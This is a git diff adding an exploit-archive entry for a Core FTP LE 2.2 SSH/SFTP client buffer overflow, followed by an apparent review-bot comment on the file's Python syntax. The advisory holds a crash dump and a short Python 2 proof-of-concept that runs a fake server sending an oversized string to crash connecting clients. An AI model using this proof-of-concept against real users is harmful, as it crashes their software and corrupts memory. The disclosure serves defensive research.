diff --git a/README.md b/README.md
old mode 100755
new mode 100644
diff --git a/files.csv b/files.csv
old mode 100755
new mode 100644
index 62393350c..a14c17815
--- a/files.csv
+++ b/files.csv
@@ -5280,6 +5280,7 @@ id,file,description,date,author,platform,type,port
 40806,platforms/linux/dos/40806.py,"NTP 4.2.8p8 - Denial of Service",2016-11-21,"Magnus Klaaborg Stubman",linux,dos,0
 40814,platforms/hardware/dos/40814.txt,"TP-LINK TDDP - Multiple Vulnerabilities",2016-11-22,"Core Security",hardware,dos,1040
 40815,platforms/windows/dos/40815.html,"Microsoft Internet Explorer 8 MSHTML - 'Ptls5::Ls­Find­Span­Visual­Boundaries' Memory Corruption",2016-11-22,Skylined,windows,dos,0
+40828,platforms/windows/dos/40828.py,"Core FTP LE 2.2 - 'SSH/SFTP' Remote Buffer Overflow (PoC)",2016-11-27,hyp3rlinx,windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
diff --git a/platforms/windows/dos/40828.py b/platforms/windows/dos/40828.py
new file mode 100755
index 000000000..db90ac263
--- /dev/null
+++ b/platforms/windows/dos/40828.py
@@ -0,0 +1,124 @@
+[+] Credits: John Page aka hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source: http://hyp3rlinx.altervista.org/advisories/CORE-FTP-REMOTE-SSH-SFTP-BUFFER-OVERFLOW.txt
+
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+===============
+www.coreftp.com
+
+
+
+Product:
+========================
+Core FTP LE (client)
+v2.2 build 1883
+
+Core FTP LE - free Windows software that includes the client FTP features
+you need. Features like SFTP (SSH), SSL, TLS, FTPS, IDN,
+browser integration, site to site transfers, FTP transfer resume, drag and
+drop support, file viewing & editing, firewall support,
+custom commands, FTP URL parsing, command line transfers, filters, and
+much, much more.
+
+
+
+Vulnerability Type:
+================================
+Remote SSH/SFTP Buffer Overflow
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Vulnerability Details:
+=====================
+
+Core FTP client is vulnerable to remote buffer overflow denial of service
+when connecting to a malicious server using
+SSH/SFTP protocol.
+
+Upon receiving an overly long string of junk from the malicious FTP server
+response, Core FTP crashes and the stack
+is corrupted with several registers EBX, EDX, EDI being overwritten as can
+be seen below.
+
+WinDbg dump...
+
+(d9c.16d8): Access violation - code c0000005 (first/second chance not
+available)
+eax=035b0000 ebx=00004141 ecx=03ac7e40 edx=41414141 esi=03ac7e38
+edi=41414141
+eip=77313ac3 esp=0439fa10 ebp=0439fae0 iopl=0 nv up ei pl nz ac pe
+nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
+efl=00010216
+ntdll!RtlImageNtHeader+0x92f:
+77313ac3 8b12 mov edx,dword ptr [edx]
+ ds:002b:41414141=????????
+
+
+
+
+Exploit code(s):
+===============
+
+import socket
+
+print 'hyp3rlinx - Apparition Security'
+print 'Core FTP SSH/SFTP Remote Buffer Overflow / DOS\r\n'
+host='127.0.0.1'
+
+port = 22
+s = socket.socket()
+
+payload="A"*77500
+s.bind((host, port))
+s.listen(5)
+
+print 'Listening on port... %i' %port
+print 'Connect to me!'
+
+while True:
+ conn, addr = s.accept()
+ conn.send(payload+'\r\n')
+ conn.close()
+
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+
+Severity Level:
+===============
+High
+
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the
+information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author
+prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
+
+hyp3rlinx
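Review bot: The new file is committed under a `.py` name but its first line is advisory prose (`[+] Credits: John Page aka hyp3rlinx`), so a Python interpreter raises a SyntaxError there and never reaches the `import socket` block; either the prose belongs in a module docstring or `#` comments, or the entry should use a `.txt` extension as the neighbouring 40814.txt row in files.csv does. The code itself is Python 2 only (`print 'Connect to me!'` statements), which is worth stating in a leading comment such as `# Python 2 PoC listener; advisory text above is not executable`. The listening socket `s` is also never closed and the `while True` accept loop has no exit, so the script can only be stopped by killing the process. The files.csv row's date, author and platform fields are consistent with the header, so I see no metadata mismatch.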